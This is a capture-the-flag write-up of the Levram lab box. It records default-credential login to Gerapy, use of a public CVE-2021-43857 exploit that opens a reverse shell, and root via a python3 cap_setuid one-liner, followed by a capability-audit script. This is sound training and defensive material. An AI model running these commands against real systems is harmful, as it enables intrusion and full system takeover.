
Proving Grounds Practice - Levram

Difficulty

easy

scans

autorecon scan

[*] ssh found on tcp/22.
OpenSSH 8.9p1


[*] http-alt found on tcp/8000.
WSGIServer/0.2 CPython/3.10.6
SilverStream
Title: Gerapy

foothold

8000 gerapy

Logged in with the weak password admin:admin.

The version number is shown at the bottom of the page.

searchsploit

searchsploit gerapy

The exploit matches the version exactly, but running it threw an error. Reading the exploit code showed that the request for the project list returned no data; after creating a new project called "test" and re-running the exploit, a reverse shell came back successfully.

python 50640.py -t 192.168.212.24 -p 8000 -L 192.168.45.184 -P 80
______ _______ ____ ___ ____ _ _ _ _____ ___ ____ _____
/ ___\ \ / / ____| |___ \ / _ \___ \/ | | || ||___ / ( _ ) ___|___ |
| | \ \ / /| _| _____ __) | | | |__) | |_____| || |_ |_ \ / _ \___ \ / /
| |___ \ V / | |__|_____/ __/| |_| / __/| |_____|__ _|__) | (_) |__) |/ /
\____| \_/ |_____| |_____|\___/_____|_| |_||____/ \___/____//_/


Exploit for CVE-2021-43857
For: Gerapy < 0.9.8
[*] Resolving URL...
[*] Logging in to application...
[*] Login successful! Proceeding...
[*] Getting the project list
Traceback (most recent call last):
File "/home/kali/Tools/pg/Levarm/50640.py", line 130, in <module>
exp.exploitation()
File "/home/kali/Tools/pg/Levarm/50640.py", line 76, in exploitation
name = dict3[0]['name']
~~~~~^^^
IndexError: list index out of range

python 50640.py -t 192.168.212.24 -p 8000 -L 192.168.45.184 -P 80
______ _______ ____ ___ ____ _ _ _ _____ ___ ____ _____
/ ___\ \ / / ____| |___ \ / _ \___ \/ | | || ||___ / ( _ ) ___|___ |
| | \ \ / /| _| _____ __) | | | |__) | |_____| || |_ |_ \ / _ \___ \ / /
| |___ \ V / | |__|_____/ __/| |_| / __/| |_____|__ _|__) | (_) |__) |/ /
\____| \_/ |_____| |_____|\___/_____|_| |_||____/ \___/____//_/


Exploit for CVE-2021-43857
For: Gerapy < 0.9.8
[*] Resolving URL...
[*] Logging in to application...
[*] Login successful! Proceeding...
[*] Getting the project list
[*] Found project: test
[*] Getting the ID of the project to build the URL
[*] Found ID of the project: 1
[*] Setting up a netcat listener
listening on [any] 80 ...
[*] Executing reverse shell payload
[*] Watchout for shell! :)
connect to [192.168.45.184] from (UNKNOWN) [192.168.212.24] 44652
bash: cannot set terminal process group (846): Inappropriate ioctl for device
bash: no job control in this shell
app@ubuntu:~/gerapy$ id
id
uid=1000(app) gid=1000(app) groups=1000(app)

escalation

Downloaded linpeas and found that python3 carries the cap_setuid capability; running python3 -c 'import os; os.setuid(0); os.system("/bin/sh")' escalates to root.

https://gtfobins.github.io/gtfobins/python/

python3 -c 'import os; os.setuid(0); os.system("/bin/sh")'
# id
uid=0(root) gid=1000(app) groups=1000(app)
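A defensive counterpart to the escalation step above, added here as an example and not part of the original writeup: it parses `getcap -r /` output (sample lines constructed inline, covering both the old and the new libcap output formats; the perl and foo entries are invented) and flags binaries whose effective or permitted set grants CAP_SETUID or CAP_SETGID, which is exactly what turned python3 into a root shell on this box.

```python
# Audit `getcap -r /` output for binaries that can switch uid/gid.
# Handles the old libcap format (`path = cap_a+ep`) and the newer one
# (`path cap_a=ep`), and flags files whose effective or permitted set
# contains CAP_SETUID/CAP_SETGID, the condition that let python3 become
# a root shell on this box.
import re

# Capabilities that let a process change its own credentials.
CRED_CAPS = {"cap_setuid", "cap_setgid"}

# Old libcap format:  /usr/bin/python3.10 = cap_setuid+ep
# New libcap format:  /usr/bin/python3.10 cap_setuid=ep
_OLD = re.compile(r"^(?P<path>\S+) = (?P<caps>[\w,]+)\+(?P<flags>[eip]+)$")
_NEW = re.compile(r"^(?P<path>\S+) (?P<caps>[\w,]+)=(?P<flags>[eip]+)$")

# Constructed sample output; the perl and foo entries are invented.
SAMPLE_GETCAP = """\
/usr/bin/ping = cap_net_raw+ep
/usr/bin/python3.10 = cap_setuid+ep
/usr/bin/mtr-packet cap_net_raw=ep
/usr/local/bin/perl cap_setuid=ep
/usr/bin/foo = cap_setgid+i
"""

def parse_getcap_line(line):
    """Return (path, set_of_caps, flag_string) for one getcap line, or None."""
    m = _OLD.match(line.strip()) or _NEW.match(line.strip())
    if not m:
        return None
    return m.group("path"), set(m.group("caps").lower().split(",")), m.group("flags")

def find_risky(lines):
    """Paths whose effective/permitted set includes a credential-changing cap."""
    risky = []
    for line in lines:
        parsed = parse_getcap_line(line)
        if parsed is None:
            continue
        path, caps, flags = parsed
        # An inheritable-only grant ("+i") is not usable by the binary on its own.
        if caps & CRED_CAPS and ("e" in flags or "p" in flags):
            risky.append(path)
    return risky

if __name__ == "__main__":
    for p in find_risky(SAMPLE_GETCAP.splitlines()):
        print("credential-changing capability on", p)
```

On a live host, pipe the real `getcap -r / 2>/dev/null` output into `find_risky`; any interpreter it reports should lose the capability (`setcap -r <path>`) or be replaced by a dedicated helper that needs it.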